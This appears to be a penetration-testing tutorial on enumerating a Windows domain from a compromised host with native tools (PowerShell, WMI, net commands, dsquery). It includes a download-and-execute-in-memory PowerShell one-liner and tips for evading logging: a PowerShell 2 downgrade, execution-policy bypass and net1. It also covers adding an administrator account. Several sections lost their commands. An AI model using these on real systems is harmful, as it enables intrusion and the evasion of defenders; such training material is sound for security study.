Earlier, we learned about how to enumerate the domain from the beachhead by importing tools and scripts to the system.
In this part, I will write about using native Windows tools to perform our enumeration.
Basic Commands
Command
Result
hostname
Prints the PC’s Name
[System.Environment]::OSVersion.Version
Prints out the OS version and revision level
wmic qfe get Caption,Description,HotFixID,InstalledOn
Prints the patches and hotfixes applied to the host
ipconfig /all
Prints out network adapter state and configurations
set
Displays a list of environment variables for the current session (ran from CMD-prompt)
echo %USERDOMAIN%
Displays the domain name to which the host belongs (ran from CMD-prompt)
echo %logonserver%
Prints out the name of the Domain controller the host checks in with (ran from CMD-prompt)
systeminfo: Prints summary of the host’s information for us in one tidy output.
Running one command is better because it generates fewer logs.
PowerShell
PowerShell has been around since 2006.
Cmd-Let
Description
Get-Module
Lists available modules loaded for use.
Get-ExecutionPolicy -List
Will print the execution policy settings for each scope on a host.
Set-ExecutionPolicy Bypass -Scope Process
This will change the policy for our current process using the -Scope parameter. Doing so will revert the policy once we vacate the process or terminate it. This is ideal because we won’t be making a permanent change to the victim host.
With this string, we can get the specified user’s PowerShell history. This can be quite helpful as the command history may contain passwords or point us towards configuration files or scripts that contain passwords.
Get-ChildItem Env: | ft Key,Value
Return environment values such as key paths, users, computer information, etc.
powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('URL to download the file from'); <follow-on commands>"
This is a quick and easy way to download a file from the web using PowerShell and call it from memory.
Downgrade PowerShell
Sometimes several versions of PowerShell exists on a host.
If we use lower version of PowerShell that is not used anymore, then our actions from the shell will not be logged in Event Viewer.
Notice the change in version after using powershell2:
Checking Defense
Let’s check on Windows Firewall settings and Windows Defender status.
Firewall Checks
Windows Defender Check
Get-MpComputerStatus
Let’s check for status and configuration settings.
We can know what revision our AV settings are at and what settings are enabled/disabled.
Am I Alone?
Let’s check if there’s other users on the system.
If attacker attempts on things with different user on system, it might alert that user.
qwinsta
Network Enumeration
Now we have a solid feel for the stat of our host.
Let’s enumerate the network settings for our host and identify any potential domain machines and services for target.
Commands
Description
arp -a
Lists all known hosts stored in the arp table.
ipconfig /all
Prints out adapter settings for the host. We can figure out the network segment from here.
route print
Displays the routing table (IPv4 & IPv6) identifying known networks and layer three routes shared with the host.
netsh advfirewall show state
Displays the status of the host’s firewall. We can determine if it is active and filtering traffic.
Windows Management Instrumentation
WMI is a scripting engine that is wdiely used within Windows enterprise environments to retrieve information and run administrative tasks on local and remote hosts.
We can ask for:
Domain Users
Groups
Processes
etc
Command
Description
wmic qfe get Caption,Description,HotFixID,InstalledOn
Prints the patch level and description of the Hotfixes applied
wmic computersystem get Name,Domain,Manufacturer,Model,Username,Roles /format:List
Displays basic host information to include any attributes within the list
wmic process list /format:list
A listing of all processes on host
wmic ntdomain list /format:list
Displays information about the Domain and Domain Controllers
wmic useraccount list /format:list
Displays information about all local accounts and any domain accounts that have logged into the device
wmic group list /format:list
Information about all local groups
wmic sysaccount list /format:list
Dumps information about any system accounts that are being used as service accounts.
Let’s query for domain and child domain:
Net Commands
Net commands can be used to enumerate information from the domain.
Local and domain users
Groups
Hosts
Specific users in groups
Domain Controllers
Password requirements
Command
Description
net accounts
Information about password requirements
net accounts /domain
Password and lockout policy
net group /domain
Information about domain groups
net group "Domain Admins" /domain
List users with domain admin privileges
net group "domain computers" /domain
List of PCs connected to the domain
net group "Domain Controllers" /domain
List PC accounts of domains controllers
net group <domain_group_name> /domain
User that belongs to the group
net groups /domain
List of domain groups
net localgroup
All available groups
net localgroup administrators /domain
List users that belong to the administrators group inside the domain (the group Domain Admins is included here by default)
net localgroup Administrators
Information about a group (admins)
net localgroup administrators [username] /add
Add user to administrators
net share
Check current shares
net user <ACCOUNT_NAME> /domain
Get information about a user within the domain
net user /domain
List all users of the domain
net user %username%
Information about the current user
net use x: \computer\share
Mount the share locally
net view
Get a list of computers
net view /all /domain[:domainname]
Shares on the domains
net view \computer /ALL
List shares of a computer
net view /domain
List of PCs of the domain
If we believe network defenders are actively logging for any commands out of normal → Use net1 instead of net.
Dsquery
This tool can be easily replicated with tools such as Bloodhound and Powerview.
You can find it from C:\Windows\System32\dsquery.dll.
We need a SYSTEM level terminal to use it.
User search:
Computer search:
Wildcard search:
Users with PASSWD_NOTREQD flag set in the userAccountControl attribute: